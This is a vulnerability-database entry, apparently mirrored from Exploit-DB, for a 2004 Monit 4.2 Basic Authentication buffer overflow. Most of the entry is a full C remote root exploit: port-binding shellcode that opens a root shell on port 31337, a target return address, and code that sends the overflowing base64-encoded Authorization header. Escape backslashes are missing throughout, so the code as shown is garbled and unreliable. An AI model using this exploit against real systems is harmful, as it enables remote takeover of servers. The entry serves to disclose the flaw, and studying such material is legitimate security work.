TildeSlash Monit 1-4 – Authentication Handling Buffer Overflow

漏洞ID	1054482	漏洞类型
发布时间	2004-06-04	更新时间	2004-06-04
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Multiple	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/24224

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/10581/info

It is reported that TildeSlash Monit is vulnerable to a buffer overflow vulnerability during authentication handling. This issue arises due to a failure of the affected application to properly handle user-supplied strings when copying them into finite stack-based buffers.

Successful exploitation of this issue allows an attacker to execute arbitrary code as the superuser; facilitating unauthorized access and privilege escalation.

/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
*
* http://www.eos-india.net/poc/305monit.c
* Remote Root Exploit for Monit <= 4.2
* Vulnerability: Buffer overflow in handling of Basic Authentication informations.
* Server authenticates clients through:
* Authentication: Basic Base64Encode[UserName:Password]
* Here we are exploiting the insecure handling of username in Basic Authentication information to return
* control (EIP) to our payload.
*
* Nilanjan De [n2n<at>linuxmail<dot>org] - Abhisek Datta [abhisek<at>front<dot>ru]
*
* 06.04.2004
* http://www.eos-india.net
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>

#define BUFF_SIZE 2048
#define PADDING 40
#define EXP_SIZE (256+4+PADDING)
#define MAX_ARCH 2
struct eos{
char *arch;
unsigned long ret;
} targets[] = {
"Monit-4.2-Gentoo",
0xbf7fef02,
//-------------------------------
"Monit <=4.2 Crash",
0xbadc0ded,
NULL,
0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/

char shellcode[]=
/* sys_fork() */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x02" // movb $0x2,%al
"xcdx80" // int $0x80
"x38xc3" // cmpl %ebx,%eax
"x74x05" // je 0x5
/* sys_exit() */
"x8dx43x01" // leal 0x1(%ebx),%eax
"xcdx80" // int $0x80
/* setuid(0) */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x17" // movb $0x17,%al
"xcdx80" // int $0x80
/* socket() */
"x31xc0" // xorl %eax,%eax
"x89x45x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
"x40" // incl %eax
"x89xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
"x89x45x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
"x40" // incl %eax
"x89x45x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
"x8dx4dx08" // leal 0x8(%ebp),%ecx
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89x45x08" // movl %eax,0x8(%ebp)

/* bind()*/
"x43" // incl %ebx(SYS_BIND = 0x2)
"x66x89x5dx14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
"x66xc7x45x16x7ax69" // movw $0x697a,0x16(%ebp)(port=31337)
"x31xd2" // xorl %edx,%edx
"x89x55x18" // movl %edx,0x18(%ebp)
"x8dx55x14" // leal 0x14(%ebp),%edx
"x89x55x0c" // movl %edx,0xc(%ebp)
"xc6x45x10x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80

/* listen() */
"x40" // incl %eax
"x89x45x0c" // movl %eax,0xc(%ebp)
"x43" // incl %ebx
"x43" // incl %ebx(SYS_LISTEN = 0x4)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80

/* accept() */
"x43" // incl %ebx
"x89x45x0c" // movl %eax,0xc(%ebp)
"x89x45x10" // movl %eax,0x10(%ebp)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89xc3" // movl %eax,%ebx

/* dup2() */
"x31xc9" // xorl %ecx,%ecx
"xb0x3f" // movb $0x3f,%al
"xcdx80" // int $0x80
"x41" // incl %ecx
"x80xf9x03" // cmpb $0x3,%cl
"x75xf6" // jne -0xa

/* execve() */
"x31xd2" // xorl %edx,%edx
"x52" // pushl %edx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x2fx2fx62x69" // pushl $0x69622f2f
"x89xe3" // movl %esp,%ebx
"x52" // pushl %edx
"x53" // pushl %ebx
"x89xe1" // movl %esp,%ecx
"xb0x0b" // movb $0xb,%al
"xcdx80"; // int $0x80

void show_help(char *pr00gie,u_short opt) {
int i=0;
printf("==========> THE EYE ON SECURITY RESEARCH GROUP <==========n");
printf("Monit <= 4.2 Remote Root Exploitn");
printf("n2n[at]linuxmail[dot]org - abhisek[at]front[dot]run");
printf("http://www.eos-india.netnn");
if(!opt)
return;
printf("[usage]n");
printf("%s [Remote Host] [Remote Port] [Target]n",pr00gie);
printf("[Available Targets]n");
while(targets[i].arch != NULL) {
printf("%d. - %st - %pn",(i),targets[i].arch,targets[i].ret);
i++;
}
}
/* Base 64 code ripped from monit src */
/**
* Base64 encode one byte
*/
static char encode(unsigned char u) {

if(u < 26) return 'A'+u;
if(u < 52) return 'a'+(u-26);
if(u < 62) return '0'+(u-52);
if(u == 62) return '+';

return '/';

}
/**
* Base64 encode and return size data in 'src'. The caller must free the
* returned string.
* @param size The size of the data in src
* @param src The data to be base64 encode
* @return encoded string otherwise NULL
*/
char *encode_base64(int size, unsigned char *src) {

int i;
char *out, *p;

if(!src)
return NULL;

if(!size)
size= strlen((char *)src);

out= (char *)malloc(sizeof(char)*size*4/3+4);

p= out;

for(i=0; i<size; i+=3) {

unsigned char b1=0, b2=0, b3=0, b4=0, b5=0, b6=0, b7=0;

b1 = src[i];

if(i+1<size)
b2 = src[i+1];

if(i+2<size)
b3 = src[i+2];

b4= b1>>2;
b5= ((b1&0x3)<<4)|(b2>>4);
b6= ((b2&0xf)<<2)|(b3>>6);
b7= b3&0x3f;

*p++= encode(b4);
*p++= encode(b5);

if(i+1<size) {
*p++= encode(b6);
} else {
*p++= '=';
}

if(i+2<size) {
*p++= encode(b7);
} else {
*p++= '=';
}

}

return out;

}


void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
char *exp_buff;
char *exp_buff_encoded;
int i;
if (!(exp_buff=(char*)malloc(EXP_SIZE))){
perror("malloc()");
exit(1);
}

memset(exp_buff,0x90,EXP_SIZE);
strcpy(exp_buff+256-strlen(shellcode),shellcode);
for(i=256;i<EXP_SIZE-5;i+=4)
memcpy(exp_buff+i,magic,4);
strcpy(exp_buff+EXP_SIZE-4,":x");
exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);
memset(buff,0x00,size);
sprintf(buff,"GET / HTTP/1.0rn");
sprintf(buff,"%sHost: %srn",buff,host);
sprintf(buff,"%sAuthorization: Basic %srnrnrn",buff,exp_buff_encoded);

}
int main(int argc,char *argv[]) {
char *host;
char *b;
int rport;
int sockfd;
struct sockaddr_in sin;
struct hostent *h;
unsigned int n;
unsigned long magic;
if(argc != 4) {
show_help(argv[0],1);
exit(1);
}
host=argv[1];
rport=(atoi(argv[2]));
n=atoi(argv[3]);
if((n >= MAX_ARCH)||(n<0)) {
printf("- Invalid targetn");
show_help(argv[0],1);
exit(1);
}
magic=targets[n].ret;
show_help(argv[0],0);
printf("-Using RET %pn",magic);
printf("Resolving %st",host);
h=gethostbyname(host);
if(!h) {
printf("[ERROR]nUnable to resolve: %sn",host);
exit(1);
}
else
printf("[DONE]n");
b=(char*)malloc(BUFF_SIZE);
if(!b) {
perror("malloc");
exit(1);
}
sin.sin_addr=*((struct in_addr*)h->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons((u_short)rport);
if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
perror("socket");
exit(1);
}
printf("Connecting to %s:%dt",host,rport);
if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
printf("[ERROR]nUnable to connect: %s:%dn",host,rport);
perror("connect");
exit(1);
}
else
printf("[DONE]n");
make_http_request(b,BUFF_SIZE,host,&magic);
if(send(sockfd,b,strlen(b),0) == strlen(b))
printf("Successfully send exploit stringn");
else
printf("Failed sending exploit stringn");
close(sockfd);
return 0;
}

相关推荐: OpenOffice Remote Access Denial Of Service Vulnerability

OpenOffice Remote Access Denial Of Service Vulnerability 漏洞ID 1099401 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2003-10-0…

文章版权归作者所有，未经允许请勿转载。

THE END